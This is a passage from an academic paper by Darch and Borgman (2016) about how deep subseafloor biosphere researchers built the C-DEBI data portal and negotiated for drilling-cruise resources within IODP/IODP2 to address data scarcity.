with institutional challenges facing scientific ocean drilling programs. The predecessors to IODP that ran from 1968 to 2003 focused almost exclusively on physical science research. These programs facilitated major scientific successes. Best known is the evidence for the theory of plate tectonics and continental drift (Committee on the Review of the Scientific Accomplishments and Assessment of the Potential for Future Transformative Discoveries with US-Supported Scientific Ocean Drilling, 2012). Many scientists were concerned that funding for ocean drilling would cease with the anticipated end of the Ocean Drilling Program, IODP’s immediate predecessor, in 2003. Expanding the drilling mission to include the deep subseafloor biosphere provided the momentum necessary to secure funding for IODP to launch in 2003. One of our interviewees, a senior administrator within IODP, quoted Admiral Watkins, who then headed the Joint Oceanographic Institutions, ‘‘I can remember ...him saying, ‘Give me bugs and I can give you a new program’’ (IODP policy, #1). C-DEBI as a single-domain infrastructure To reconstruct the origins of C-DEBI as an infrastructure for the emergent community of deep subseafloor biosphere researchers, we drew heavily upon documentary sources to complement our interviews and ethnography. The round of proposals for the 2003 launch of IODP was a critical inflection point. Deep subseafloor biosphere research was one of three major scientific foci for IODP (Integrated Ocean Drilling Program (IODP) Planning Sub Committee (IPSC) Scientific Planning Working Group, 2001), which planned four to five expeditions per year. Proposals were required to state the scientific objectives of the cruise and to identify the sites a cruise would visit. Three separate teams of scientists independently, and successfully, submitted proposals (in 2003, 2005, and 2007 respectively) for expeditions focused primarily on the deep subseafloor biosphere (although an IODP/IODP2 cruise will typically have a focus on one particular scientific domain, it will nevertheless involve scientists from all domains of study represented within IODP/IODP2). Rather than work independently, the successful teams joined forces to coordinate the three biosphere-focused IODP cruises, which were planned for 2010 and 2011. To consolidate the position of deep subseafloor biosphere research within IODP, in 2008 they established the Dark Energy Biosphere Investigations Research Coordination Network. This network had four specific goals (Edwards & Amend, 2008, p. 3): • ‘‘Develop an interactive community of deep-biosphere researchers • Facilitate coordination of science between deep-biosphere drilling projects • Stimulate interaction and education among disparate disciplines • Enable synthesis and integration of data and technology advances’’ This network brought together scientists in regular face-to-face meetings, with the proposal to the NSF for C-DEBI in 2009 arising from one such meeting. C-DEBI, as introduced above, is a Science and Technology Center (STC) funded by the US National Science Foundation (NSF), initially for five years from 2010–2015, and subsequently renewed for another five years from 2015–2020. The proposal to establish C-DEBI set Darch and Borgman (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.97 13/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.97 out two major goals. One is ‘‘to coordinate, integrate, support, and extend the science’’ of deep subseafloor biosphere research, and the second to help ‘‘foster and educate an interdisciplinary community of deep subseafloor biosphere researchers, with a focus on students and junior researchers’’ (Edwards, 2009: 1). The focus on students and junior researchers highlights the aspiration to establish an enduring community. The significance of this long-term view was highlighted, sadly, by the deaths of two of the five founding co-investigators during the first five years of C-DEBI. It is a tribute to their vision that the collaboration was sufficiently robust to reorganize with new investigators and to win the second five-year award. C-DEBI has developed social, technical, and policy means to pursue its aims, including funding support for scientists, a website and meetings to circulate knowledge and to bring together globally distributed researchers, and an infrastructure for data management that continues to evolve. In its early years, C-DEBI focused more on recruiting scientists to study the deep subseafloor biosphere than on building technical or policy infrastructure. Recruiting occurs by distributing grants to support small-team (usually two or three persons) laboratory-based research projects (typically one to three years in length), or graduate and postdoctoral fellowships. These grants typically support projects in which scientists use cores collected from scientific ocean drilling cruises to produce new data in their onshore laboratories, and to support projects that develop new techniques to study the deep subseafloor biosphere. To date, nearly 90 such grants have been distributed across more than 40 institutions in the USA (Center for Dark Energy Biosphere Investigations, 2016). However, in the early years of C-DEBI, these grants were not accompanied by a strategy for managing the data produced by the funded projects. C-DEBI data portal Although the C-DEBI proposal aspired to build data management infrastructure, stating that ‘‘C-DEBI will develop and maintain a website for public access and data sharing among the C-DEBI research community’’ (Edwards, 2009: 24), little was accomplished toward this goal in the first two years of operation. The first five-year Strategic Implementation Plan 2010–2015 claimed ‘‘technical difficulty’’ as the barrier to establishing the data management infrastructure (Center for Dark Energy Biosphere Investigations, 2010; 11). However, by 2012, data management infrastructure became part of the work of C-DEBI. This plan stresses that the ‘‘C-DEBI STC is committed to open access for all information and data gathered during scientific research that is conducted as part of C-DEBI’’ (Center for Dark Energy Biosphere Investigations, 2012a: 1). Starting in 2012, C-DEBI responded to new NSF requirements by mandating that participating scientists must make data publicly available after a moratorium, typically two years. C-DEBI developed their data management strategy as part of their application for renewal of NSF funding for the second five-year period, 2015–2020. The most critical strategic challenge for C-DEBI during its first years of operation was to navigate this NSF renewal process successfully. The C-DEBI Data Portal, comprising a registry and repository, is a central element of C-DEBI’s strategic goals for their second five-year project (Center for Dark Energy Biosphere Investigations, 2014a). C-DEBI requires participating teams to register all associated datasets Darch and Borgman (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.97 14/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.97 that support published results on the portal, and to deposit them in a relevant, online, publicly accessible database. The portal contains metadata about each dataset, including details about the provenance of the cores used (including the name of the research site, the cruise number, and the specific drill hole(s) where the samples originated), and a link to the dataset if it is hosted externally. In mid-2013, C-DEBI assembled a team to build the data portal, which included one co-PI, a scientific database expert from another C-DEBI institution, and the C-DEBI Administrative Assistant. Since the Center’s inception, the Administrative Assistant had responsibility for building and maintaining the C-DEBI project website. His job was expanded to include leading the development of the data portal. C-DEBI allocated substantial funding to portal development: $95,000 in 2013 and an additional $287,000 for 2014 (Center for Dark Energy Biosphere Investigations, 2014b). The first phase, which included prototyping and site architecture, was completed for the NSF visit to C-DEBI in January 2014. Subsequently, the job title of the Administrative Assistant was changed to Data Manager, reflecting the shift in the importance to C-DEBI of data management infrastructure from a marginalized aspiration to a central goal. Alternative approaches to single-domain infrastructure The existence of the data portal, and the form it takes, is only partially determined by NSF requirements. To determine the degree to which the form of C-DEBI data management infrastructure is driven by NSF data management requirements, we examined how other NSF Science and Technology Centers have addressed these requirements. C-DEBI is one of 11 current STCs, all of which are subject to NSF data release requirements. However, the STCs interpret these requirements in a variety of ways. Hence, only three of the other ten STCs operate an online, publicly-accessible registry or repository to make these data accessible, whether by downloading datasets, by providing links to other sources, or by providing contact information for people associated with datasets (Center for Coastal Margin Observation & Prediction, 2015; Center for Microbial Oceanography Research and Education, 2015a; Center for Remote Sensing of Ice Sheets, 2015). The data registries or repositories of these STCs vary in the types of datasets they contain and in the scope of metadata they capture about each dataset. The Center for Microbial Oceanography Research and Education, or C-MORE, is the STC most scientifically comparable to C-DEBI, in that they study microbial ecology in the ocean and scientists use samples collected from ocean research cruises operated directly by C-MORE. C-DEBI is distinguished from other STCs with online data infrastructure by requiring the most comprehensive set of metadata for datasets in its registry and repository. For example, while both the C-DEBI and C-MORE registries have a category to name the research cruise from which each dataset was derived (Center for Microbial Oceanography Research and Education, 2015b), C-DEBI also has a category for the precise geographic location from where the sample was drawn. Another example is that the C-DEBI registry has metadata categories detailing the publication(s) in which a particular dataset has been used; by contrast, the C-MORE registry does not. Darch and Borgman (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.97 15/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.97 The current STCs have implemented the NSF requirements in different ways, despite their scientific and organizational similarities. In other words, the existence of the NSF requirements do not completely account for what data management policies or infrastructure are implemented by C-DEBI, nor do they account for the specific form and function of these policies and infrastructure. Shared infrastructure and community building IODP/IODP2 expeditions are the primary source of physical samples and data used in the onshore laboratories of the deep subseafloor biosphere researchers we studied. Some scientists also participate in cruises operated by other organizations (University- National Oceanographic Laboratory Services, 2015). However, these non-IODP/IODP2 cruises usually revisit sites drilled during previous IODP/IODP2 expeditions. International ocean drilling programs IODP/IODP2 is infrastructure, consisting of ships, scientific equipment and personnel, and an organizational structure shared between the deep subseafloor biosphere community and several other domains. Consequently, these domains compete for scarce resources. Their representatives are involved in decision-making processes within IODP/IODP2 about the scope of their programmatic research and the organization of specific cruises. The expansion of IODP scientific activities to include deep subseafloor biosphere research required other domains to concede some of their share of IODP resources. While our C-DEBI participants generally reported a collegial atmosphere among scientists on IODP/IODP2 cruises, many deep subseafloor biosphere researchers nevertheless encounter resistance, such as objections to the number of cores allocated to deep subseafloor biosphere researchers: ‘‘We encounter resistance [from other domains] when we apply to sail. We encounter it when we apply for sample requests. We encounter it when we set up for post-cruise fundings, and also for regular grant writing.’’ (C-DEBI faculty, #1) Increased competition for places on cruises is but one of the ways in which other domains concede resources to accommodate research about the deep subseafloor biosphere. A wider variety of domains also compete for allocation of cores, the precious sources of physical and microbiological data from cruises. Initial decisions made on board the ships determine the core’s value to these competing communities. The most critical initial decision for the microbiology community is the temperature at which cores are stored. While samples for physical analysis are typically stored at −4 ◦C, samples for microbiological analysis are typically stored at −80 ◦C to avoid contamination and to stabilize biological material. Other handling decisions include the ways in which the cores are cut and distributed to participating scientific teams. The number of cores per cruise is finite, therefore producing more cores suitable for microbiological analysis results in fewer cores suitable for physical science analysis: ‘‘What you do with this core you just split these one meter sections lengthwise, open it up so you have two halves of it.... For microbiology and geochemistry you do it somewhat differently. You take the core, you’re not cutting it up lengthwise but you cut out short Darch and Borgman (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.97 16/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.97 sections...So you lose the entire stratigraphic information from that core.’’ (C-DEBI faculty, #2) The allocation of cores to research teams requires intensive negotiation. Pre-cruise meetings to negotiate allocations result in a Sampling Plan for the voyage. During a cruise, Sampling Plans frequently are adapted to changing conditions and to the relative success of core sampling, leading to further negotiation of resources: ‘‘Sometimes ...we don’t receive that much [biological] core material. Sometimes you may have a small piece and 15 people want something from the small piece so then that has to go through iterations of compromise.’’ (IODP curator, #1) As a new area of science, a particular challenge for deep subseafloor biosphere researchers is their own methodological diversity. The lack of agreement within the deep subseafloor biosphere research community on standard practices for data handling works against them in negotiating for more cores. As discussed in more depth elsewhere (Darch & Sands, 2015), workflows to characterize microbiological communities in cores vary significantly, even between scientists working on adjacent benches in the same laboratory. Scientists from other domains sometimes use this variation to argue against allocation of cores to deep subseafloor biosphere researchers, as one of our interviewees encountered: ‘‘Those that are competing with us for sediment material, the hard rocks guys, the sedimentologists, those guys that are then lobbying for the same sediment samples that we’re going after, they can turn to us and say, ‘Well, you know what, if we handed you half of this and you half of this, you guys would come back with two different datasets, so what’s the point of handing it to any of you because you guys can’t describe it in the same way anyway?’ ’’ (C-DEBI faculty, #1) As IODP approached the end of its funding period in 2013, concerns arose among stakeholders about continued government funding for scientific ocean drilling cruises, and indeed, funding was reduced for IODP’s successor, IODP2 (Committee on Guidance for NSF on National Ocean Science Research Priorities: Decadal Survey for Ocean Sciences, 2015). However, the physical infrastructure (cruise ships, core repositories, data management systems) of IODP2 is largely that of IODP. In addition to maintaining their position within IODP2, deep subseafloor biosphere researchers also aspire to secure more resources for deep subseafloor biosphere research in the future. One aspiration is to produce more standardized data on board the ocean drilling cruises, akin to the standardized set of analyses of physical properties that are routinely conducted and made publicly available through an IODP2 database. As no comparable set of standards exists for the microbiological properties, cruises neither conduct nor report basic microbiological descriptions of cores. Many of the C-DEBI-affiliated scientists interviewed mentioned this lack of agreement around standardized methods as a serious constraint on their scientific progress (Orcutt et al., 2013). Instead, individual scientists devote much effort to basic microbiological analyses in their home laboratories. The time and expense of basic description limits the resources available to conduct more advanced analyses, as explained by one of our interviewees: Darch and Borgman (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.97 17/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.97 ‘‘Post-expeditions Awards provide $15,000 worth of support for up to two years, for you to do the research that you proposed to do while you were at sea ...The difference between what we can use that money for, and say what a sedimentologist can use that money for, is grossly different. Because a sedimentologist, the geochemist, the petrologist, the paleo-mag guys, all of them pretty much have all the data. And so, they’re looking at the $15,000 as seed money to maybe do some analysis that they maybe pay for a grad student, maybe pay for a technician, maybe pay for somebody’s time, to analyze it, to maybe take it another di- rection...For the biologist, we have $15,000 to now process all of our samples, do all the se- quence analysis, do the bulk labor of all of our work on the equipment that we already have to have in our lab versus what everybody else is using on the ship.’’ (C-DEBI faculty, #1) However, to include microbiological description of cores on board all cruises would require major reconfiguration of existing cruise practices. These practices were established over many years before microbiology’s inclusion in cruises: ‘‘It took them decades to come up with the system... standard protocols, standard proce- dures, standard storage. It makes it a little bit rigid like I said, when you do something new and novel, like the living things don’t really have a place yet.’’ (C-DEBI faculty, #4) Consequently, attempts to change IODP2 practices in support of deep subseafloor biosphere research would require a significant amount of effort and would diminish the resources available for more physical science-oriented domains in IODP2. To date, these attempts have faced considerable resistance: ‘‘Geochemical and geophysical research objectives represented on IODP expeditions are routinely provided by dedicated shipboard scientists and technicians assigned to completing standard procedures on all core material. The call for an additional biological workload on these individuals is typically met with an argument claiming a lack of time and resources on board.’’ (Orcutt et al., 2013, p. 8) One of our interviewees told us that much of the resistance from these physical scientists is that, ‘‘as a community [of deep subseafloor researchers], we can’t agree on anything’’ regarding methodology. While this resistance on the part of physical science disciplines appears to be motivated by a fear of losing IODP resources, their arguments are that the lack of standardization of microbiological workflows means that microbiological analyses cannot be included as part of the workflow on IODP cruises. Consequently, many C-DEBI scientists recognize that the deep subseafloor biosphere community must undertake the work necessary to standardize microbiological workflows. Infrastructure convergence The development of the C-DEBI data management infrastructure can be understood in the light of the aspirations of deep subseafloor biosphere researchers to improve exploitation of currently-available resources from IODP/IODP2 cruises, and to reconfigure IODP2 infrastructure to secure a greater share of drilling cruise resources. Those developing C-DEBI infrastructure are working towards three goals: better curation and circulation of Darch and Borgman (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.97 18/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.97 extant data; building a community with norms of open data; and explicating the roles of IODP/IODP2 data in C-DEBI research. Here we examine how C-DEBI is addressing these three goals, and how the goals both shape, and are shaped by, the relationships between C-DEBI and IODP/IODP2 infrastructure. Improving curation of extant data The first goal of the C-DEBI data management infrastructure is to improve the curation, circulation, and accessibility of data handled by the deep subseafloor biosphere researchers. At a project workshop held in 2012 that brought together many leading members of C-DEBI, ‘‘encouragement of data sharing ...was identified as an important priority’’ (Center for Dark Energy Biosphere Investigations, 2012b, p. 3). Despite the scarcity of cores and of resources to analyze them, deep subseafloor biosphere researchers often do not take the steps necessary to preserve these data beyond the short-term or to make them easily accessible to fellow members of their domain. This situation is compounded by disparate policies and uneven provision of community databases across the scientific disciplines involved in deep subseafloor biosphere research. Scientists who publish in most microbiological journals are required to deposit genomic sequence data supporting their conclusions to publicly accessible databases such as GenBank (Benson et al., 2013), although these databases do not cover the full range of microbiological data produced by deep subseafloor biosphere scientists. No similar requirement to deposit exists for complementary physical science data. Some appropriate databases do exist but contributions of data are at the discretion of the scientist, and occur rarely, as illustrated by this quotation: ‘‘Nowadays they won’t publish your work if it has molecular [biology] data and it’s not in the database somewhere...There are now databases where you could, I guess, submit this type of data like the geological data. But I haven’t started doing that yet.’’ (C-DEBI postdoctoral researcher, #1) The C-DEBI Data Portal is intended to provide a home for these microbiological data. At one level, the goal of improved curation, accessibility, and circulation of data can be understood as a desire to increase the amount of scientific work accomplished from the limited amount of cores and data currently available. However, this goal also can be understood in terms of pursuing longer-term strategic objectives of the deep subseafloor biosphere community. Standardized approaches will support data integration and meta- analyses, for example. Better data curation will enable ‘‘our community to develop and recommend broad standards’’ (Center for Dark Energy Biosphere Investigations, 2013b, p. 4), in turn helping to promote some of the methodological standardization necessary to address the criticisms of physical science researchers. Deep subseafloor biosphere researchers have promoted standardized methods as a means to advance hypothesis-driven science and replicability (Teske et al., 2011). They expect better replicability to address concerns about the status of their field. The belief that methods for deep subseafloor biosphere research should be standardized was far from unanimous, however. As explored in more depth in Darch (2016), some Darch and Borgman (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.97 19/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.97 members view methodological heterogeneity as a key strength of the domain, with researchers from diverse disciplinary backgrounds bringing new methods to bear on research questions. A particular concern is that standardizing methods of this emergent domain is premature, and will foreclose possibilities for more efficient or reliable methods in the future. Although these debates are ongoing, proponents of standardization hold key decision-making positions within C-DEBI. Consequently, the design of C-DEBI data infrastructure promotes methods standardization. Community building Since C-DEBI’s conception, project leadership recognized the potential of data infrastructure to link distributed scientists (Edwards, 2009). In particular, the C-DEBI Data Portal is intended to ‘‘support the connection among scientists and others in ...C-DEBI’’ (Center for Dark Energy Biosphere Investigations, 2013a, p. 9). The portal is an important element to sustain and expand the community beyond the project’s anticipated end in 2020, given that 10 years is the maximum NSF STC funding. As one of our interviewees explains, ‘‘The web-based database for the entire subseafloor biosphere community will be an important legacy of C-DEBI’s contribution’’ (C-DEBI management, #1). C-DEBI hopes that its Data Portal will emulate other successful scientific databases that began as project-specific endeavors and became institutionalized with subsequent funding. However, C-DEBI does not merely seek to build a community through its data management infrastructure; it also seeks to foster particular norms among community members, notably a collaborative ethos predicated on openness and sharing of knowledge and knowledge products. As a consequence of this design and policy, scientists who do not conform to the norms of openness and data sharing are likely to be excluded. In turn, by fostering openness norms, data will be more widely available and exploited more fully. The norms are not ends in themselves, but intended to address scientific and strategic goals of studies of the deep subseafloor biosphere to obtain the needed volume and variety of data. Furthermore, C-DEBI also hopes that by helping to foster and strengthen an enduring community of researchers, their project’s legacy will ensure continued strength in advocating for deep subseafloor biosphere’s role in IODP2. Explicating IODP/IODP2 contributions to C-DEBI Given the resistance from physical science disciplines, and in light of future uncertainties around funding, deep subseafloor biosphere researchers must demonstrate that their inclusion in scientific ocean drilling cruises has resulted in scientifically valuable output. By demonstrating scientific value, they hope to secure continued IODP2 resources and to reconfigure IODP2 infrastructure in their favor. Articles in scholarly journals demonstrate scientific productivity, but do not necessarily highlight the essential or precise contributions of IODP data to their findings. Subseafloor biosphere research reports tend to integrate data from multiple sources, including cruises conducted under the auspices of organizations other than IODP/IODP2. Journal articles also report analyses of data derived in laboratory conditions that are based on cores or on instruments in drill holes left by those cores. The challenge facing the C-DEBI community, therefore, is to make more explicit the relationship between their own scientific output, IODP/IODP2 cruises, and other kinds of Darch and Borgman (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.97 20/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.97 data. One way in which C-DEBI is addressing this challenge is by assigning appropriate categories of metadata in its Data Portal. These categories include information about the origin of the cores from which the data have been derived, such the name of the research site, the cruise number, and the specific drill hole(s) where the samples originated. Such metadata serves several purposes. One is to improve the provenance of the data, which enhances replicability. Another is to improve integration of data from multiple sources. A longer-term benefit is to provide evidence that deep subseafloor biosphere researchers can use in negotiations with IODP2, both to gain more access to cruises and to reconfigure IODP2 practices in describing biological characteristics of cores. The need to demonstrate the value of IODP/IOPD2 to C-DEBI research thus motivates the development of the C-DEBI Data Portal and the choices of metadata categories. DISCUSSION Deep subseafloor biosphere researchers faced data scarcity, which they addressed by attempting to increase the volume and variety of data available to them. The entire research area emerged in the late 1990s and early 2000s when scientific data about the subseafloor became a viable goal. As more data became available, strategies for growing their research base evolved. This community continues to seek more data as a means to accomplish science at faster rates. As they matured as a community, they became increasingly concerned about their scientific status in relation to studies of microbial ecology in other environments. They altered their strategy for advancement accordingly (Kragh, 1996; Lenoir, 1999; Paul, 2009). Here, we explicate two broad themes that emerge from our case study. The first is data scarcity—what it means for a scientific domain to experience data scarcity, what the implications are for its status, and how the domain addresses this scarcity. The second is the politics of knowledge infrastructures. A scientific domain may build and configure infrastructure specific to itself and also infrastructure shared with other domains. Data scarcity Terms like ‘‘big data’’ and ‘‘little data’’ are commonly employed to denote the scale of data to which scientific domains have access (Borgman, 2015). ‘‘Data scarcity’’ is a more poignant term as it suggests a state that is unsatisfactory for a domain’s practitioners (Sawyer, 2008). The degree of data scarcity can be understood only in relation to that domain’s scientific objectives. As emergent scientific domains such as the deep subseafloor biosphere struggle to survive and thrive, they must attract resources to support researchers and infrastructure. To justify support for public funding in highly competitive environments, scientific domains must demonstrate their utility by contributing to one or both of the following: 1. Issues of major political and social concern (Mukerji, 2014), such as those relating to the environment, agriculture, and national defense; 2. Existential questions about humanity, such as the origins and evolution of life, and the origins and extent of the universe (Bowler & Morus, 2010). C-DEBI makes both claims: study of the deep subseafloor biosphere will contribute significantly to understanding the effects of global environmental change, and to the Darch and Borgman (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.97 21/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.97 origins and evolution of life. The deep subseafloor biosphere domain faces data scarcity because it aspires to pursue its scientific objectives in a more statistically intensive manner than is afforded by the data to which it currently has access. For instance, domain scientists would like to answer questions about the global distribution of microbes, which is essential to understanding the role of the deep subseafloor biosphere in important environmental processes. To answer these questions, scientists must be able to perform meta-analyses that involve aggregating datasets about the size and composition of microbial communities in many different sites of the ocean. At present, insufficient data currently exists to make accurate estimates about the global distribution of microbes. Leaders of the deep subseafloor biosphere community wish to shift the research emphasis from discovery to hypothesis-driven science, bringing their domain into line with other domains of microbiology. Hypothesis-driven science, involving statistical methods to test hypotheses, is generally regarded as more scientifically credible than discovery-driven science (Lenoir, 1999; Paul, 2009). These scientists wish to test the effects of environmental changes on the ability of different types of microbes to survive and thrive. Others wish to study microbes’ abilities to survive and adapt to extreme conditions, such as those that may have been present when life on earth began. Knowledge infrastructures Our account of C-DEBI infrastructure is enriched by understanding relationships between this single-domain infrastructure and the complexities of IODP/IODP2, and by examining how infrastructure negotiations influence access to resources. We observe a mutual shaping of the single-domain and shared infrastructure, driven by the deep subseafloor biosphere researchers’ desire to address their data scarcity. The case presented in this paper contributes to studies of knowledge infrastructures (Edwards, 2010; Edwards et al., 2013) in two respects. First, although infrastructure components often are shared and negotiated between multiple domains, surprisingly few studies have paid close attention to the difficulties of sharing infrastructural resources (Benson, 2012; Ribes & Bowker, 2008; Ribes & Finholt, 2008). Our study pays close attention to how scientists from the deep subseafloor biosphere have negotiated a share of scarce resources of IODP/IODP2, thus extending research on negotiating shared infrastructure. Second, very few studies offer accounts of how an infrastructure emerges in relation to other infrastructures upon which a domain may depend. The case presented in this article is an exemplar of configurations of knowledge infrastructure common to many domains of science. Here, the knowledge infrastructure of the deep subseafloor biosphere includes a major component shared with other domains, and another major component that it wholly controls. Further, this case demonstrates how building a single-domain infrastructure unfolds both in response to, and as a significant intervention in, the configuration of shared infrastructure. Although building the single-domain C-DEBI infrastructure may appear intended to provide immediate resources to scientists, it is also a means to access a greater portion of the shared infrastructure of IODP/IODP2. Darch and Borgman (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.97 22/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.97 How domains share or build their own infrastructures Infrastructural approaches are commonly used to gain access to data resources, and to facilitate shifts toward more data-intensive epistemologies (Bowker, 2000; Bowker, 2005; Chow-White & García-Sancho, 2012). Scientific domains can engage in infrastructure- building activities to increase opportunities for producing, analyzing, aggregating, accessing, circulating, and long-term curating of data. Existing studies suggest these activities follow one of two strategies. The strategy most widely studied involves a domain that builds infrastructure intended exclusively for itself. The second strategy, documented in a few studies, involves a domain that constructs infrastructure to share with other domains, either by building new multi-domain infrastructure or by negotiating access to extant infrastructure that already serves other domains (Benson, 2012; Ribes & Bowker, 2008; Ribes & Finholt, 2008). One contribution of our study is to demonstrate that a single scientific domain may pursue both strategies simultaneously. The deep subseafloor biosphere scientists constructed infrastructure specific to the domain (C-DEBI and its Data Portal) and negotiated greater access to infrastructure shared with other domains (ocean drilling programs such as IODP/IODP2). The single-domain C-DEBI infrastructure was built in response to the constraints and opportunities of the multi-domain IODP/IODP2 infrastructure. When multiple domains share infrastructure, they compete for elements of design and operation that serve their needs, such as choices of what data are to be collected and what standards are to be applied. Infrastructure is built on an installed base, so that adaptations are both afforded and constrained by the configurations of extant infrastructure (Star & Ruhleder, 1996). Hence, when a scientific domain first seeks access to an infrastructure controlled by other domains, they may need to adapt their scientific practices accordingly (Benson, 2012). This was the situation faced by deep subseafloor biosphere scientists in gaining access to the IODP/IODP2 infrastructure, which had established procedures for collecting, curating, and accessing samples and data; for ship-based facilities; and had favored geographic locations for scientific ocean-drilling cruises. These pre-existing practices helped to shape and constrain the scientific research opportunities of deep subseafloor biosphere scientists. One way to acquire more data is to distribute funding accordingly. Other studies have observed cases where infrastructure is designed to increase data production (Lenoir & Hays, 2000; Strauss, 2014) or to coordinate distributed sites of data collection (Aronova, Baker & Oreskes, 2010). The motivations of C-DEBI are similar, with top priority assigned to exploiting cores whose allocation between domains is hotly contested. A second way to maximize scientific work is to aggregate and integrate existing data more effectively (Leonelli & Ankeny, 2012; Meyer, 2009), for instance by embedding common standards within or across domains (Bowker, 2005; Leonelli & Ankeny, 2012) or by building links between members of the domain and fostering norms of data sharing and openness across this domain (Kelty, 2012; Leonelli, 2010). The C-DEBI data infrastructure exists to foster collaboration among other deep subseafloor biosphere researchers, and to assemble and circulate data produced by distributed domain scientists. Darch and Borgman (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.97 23/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.97 Building and converging infrastructures The single-domain C-DEBI infrastructure was designed in response to scarce IODP/IODP2 resources for deep subseafloor biosphere science. However, C-DEBI also can be understood as a means to negotiate a greater share of the IODP/IODP2 infrastructure. Negotiations between domain representatives are a typical feature of projects to build shared infrastructure (Ribes & Bowker, 2008; Ribes & Finholt, 2008). Ribes & Finholt (2008) focus on the importance of defining and representing the interests of the communities involved. C-DEBI, and its associated data infrastructure, exemplifies such a strategy. It was formed to build a strong, enduring community that speaks with one voice, creating a larger presence of deep subseafloor biosphere scientists in IODP2 negotiations. One way that C-DEBI increases the domain’s status is by making explicit the contribution of IODP/IODP2 resources to their research. The C-DEBI Data Portal, and the choices of metadata categories, provide evidence that deep subseafloor biosphere researchers can use to negotiate further involvement in IODP2. A second way is to enable meta-analyses and cross-comparisons of methods that promote methodological standardization across the domain, with the goal of making microbiological workflows standard practice on future cruises. This standardization, in turn, is deemed necessary by many C-DEBI scientists to reconfigure how IODP2 cruises operate in the future, and thus to secure more data for their community. Our case also demonstrates how relationships between single-domain and multi-domain infrastructure change over time. The infrastructure studied by (Ribes & Finholt, 2008), namely WATERS, fell apart even before it began its scientific operations. Our study, on the other hand, exposes how the configuration of C-DEBI, and the priorities of those building C-DEBI infrastructure, has shifted. In the early years of C-DEBI, distributing grants to enable data production and to recruit more scientists into the community was very much the priority. Over time, C-DEBI’s priorities changed, following from experiences in negotiating with other domains for resources during the three biosphere-focused IODP expeditions in 2010 and 2011. Biosphere scientists realized both that standardizing microbiological workflows and making explicit how they are using cores to produce data are critical challenges for acquiring more data from future drilling cruises. In turn, this awareness promoted a greater focus of C-DEBI on building and configuring online data management infrastructure. Single-domain infrastructure is subject to change and reconfiguration as domain scientists gain more experience of, and become increasingly sophisticated operators in, using shared infrastructure. In turn, these shifts will change the configurations of resources available to scientists as they seek to go about their day-to-day work. CONCLUSIONS Scientists in many fields are concerned with increasing access to data as a means to advance their scientific work, to increase access to resources, and to enhance their status in the larger scientific community. Many scientific domains have addressed these concerns through infrastructural strategies. Very often, these strategies involve sharing infrastructure with other domains, whether this infrastructure is built anew, such as in the case of the Large Darch and Borgman (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.97 24/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.97 Synoptic Survey Telescope, or is gained by membership in other infrastructures, as in the case of the deep subseafloor biosphere and IODP/IODP2. Even when funding and data seem abundant, as in LSST, resources may be scarce and must be contested between domains. In many cases, scientific domains will participate in shared infrastructure and in domain- specific infrastructure. In this article, we explored how the deep subseafloor biosphere community pursued an infrastructural approach to addressing data scarcity. Their data scarcity can be understood as a response to the challenges they face as an emergent domain in demonstrating their ability to contribute credibly to issues of critical social importance and interest. Both independent and shared infrastructures proved essential to this community’s creation and maturation. Further, we identified the mutual shaping of these shared and independent infrastructures. The independent infrastructure was built both in response to, and as an intervention in, the configuration of the shared infrastructure. We continue to study infrastructure, data management, and standards processes in the deep subseafloor biosphere research community—in particular as infrastructure continues to evolve in light of C-DEBI’s successful renewal in 2015—and in astronomy to advance our understanding of relationships between infrastructure and epistemological practices (Borgman et al., 2015). In this article, we focus on the relationships between shared and domain-specific infrastructures and the difficulties of sharing infrastructures. The deep subseafloor biosphere community continues to evolve. Current pressures to standardize methods reveal the significant challenges in ensuring that this community can act as a single, strong, and united entity in negotiating access to shared infrastructure (Darch, 2016). Relationships between shared and domain-specific infrastructures should be studied across a wider range of scientific endeavors, as points of friction often reveal deeper truths about scientific practice (Borgman et al., 2015; Edwards et al., 2011). ACKNOWLEDGEMENTS This article is based in part on a paper presented at Association for Information Science and Technology (ASIS&T) Annual Meeting 2014, Ship Space to Database: Motivations to Manage Research Data for the Deep Subseafloor Biosphere (Darch & Borgman, 2014). We acknowledge the contributions of Milena Golshan, Irene Pasquetto, Ashley E. Sands, Sharon Traweek, and Jillian Wallis for commenting on earlier drafts of this paper, and to Rebekah Cummings for assistance with conducting the case study. We are deeply grateful to those C-DEBI and IODP/IODP2 personnel who we interviewed and observed at work. ADDITIONAL INFORMATION AND DECLARATIONS Funding Research reported here has been supported by two grants from the Sloan Foundation Award: #20113194 (The Transformation of Knowledge, Culture and Practice in Data- Driven Science: A Knowledge Infrastructures Perspective, Christine L. Borgman, PI, Sharon Traweek, Co-PI, UCLA); and #201514001 (If Data Sharing Is the Answer, What Is the Question?, Christine L. Borgman, UCLA, Subcontract to Peter T. Darch, University of Darch and Borgman (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.97 25/32 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.97 IL at Urbana-Champaign). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Sloan Foundation Award: #20113194, #201514001. Competing Interests Christine L. Borgman is on the Academic Advisory Board for PeerJ Computer Science. Author Contributions • Peter T. Darch conceived and designed the experiments, performed the experiments, analyzed the data, 